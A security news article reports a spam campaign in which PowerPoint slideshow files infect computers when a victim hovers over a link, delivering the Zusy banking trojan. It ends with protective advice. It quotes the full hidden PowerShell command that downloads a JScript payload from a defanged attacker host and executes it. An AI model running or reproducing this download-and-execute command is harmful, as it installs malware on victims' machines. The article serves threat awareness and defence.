New ‘hover link’ method used to spread malware via PowerPoint files
Since macros are an appropriate way to automate some common tasks in Microsoft Office, sometimes cyber criminals prefer to use macros to download malicious software and infect computers. However, in recent versions of Microsoft Office, macros are disabled by default, which means cyber criminals need to convince you to turn on macros or grant special privilages so that the malware can run. But the situation seems to change.
Security researchers have discovered several malicious PowerPoint files that uses a special method to infect computers. This time, cyber criminals doesn’t require users to enable macros. Opening the malicious PowerPoint file by the victim and hovering over the URL link is enough to perform malicious actions and infect the computer.
Just like other malware campaigns, malicious PowerPoint files are distributed via spam emails with titles like “Purchase Order #130527” and “Confirmation”. Included attachment names as follows;
- order.ppsx’, or
When the malicious PowerPoint file is opened, it shows a single-page slide containing a link that says “Loading…Please wait”.
Just hovering over the link is enough for PowerPoint to execute following malicious code, which results in downloading malware including the new variant of the dangerous banking trojan called ‘Zusy’.
powershell -NoP -NonI -W Hidden -Exec Bypass “IEX (New-Object System.Net.WebClient).DownloadFile(‘hxxp://cccn.nl/c.php’,’$env:temp\ii.jse’); Invoke-Item ‘$env:temp\ii.jse'”
How to protect?
It is strongly advised to check if the ‘Office Protected View’ function is enabled. It is reported that ‘Protected View’ function protects users against the method used in this attack.
‘Protected View’ security warning
Again, it is always advised to use up-to-date anti-virus & anti-malware software and check email attachments before opening or downloading.
If you liked this article, follow us on Twitter @Secinform and please subscribe to our newsletter to receive the latest information security news.
156 total views, 1 views today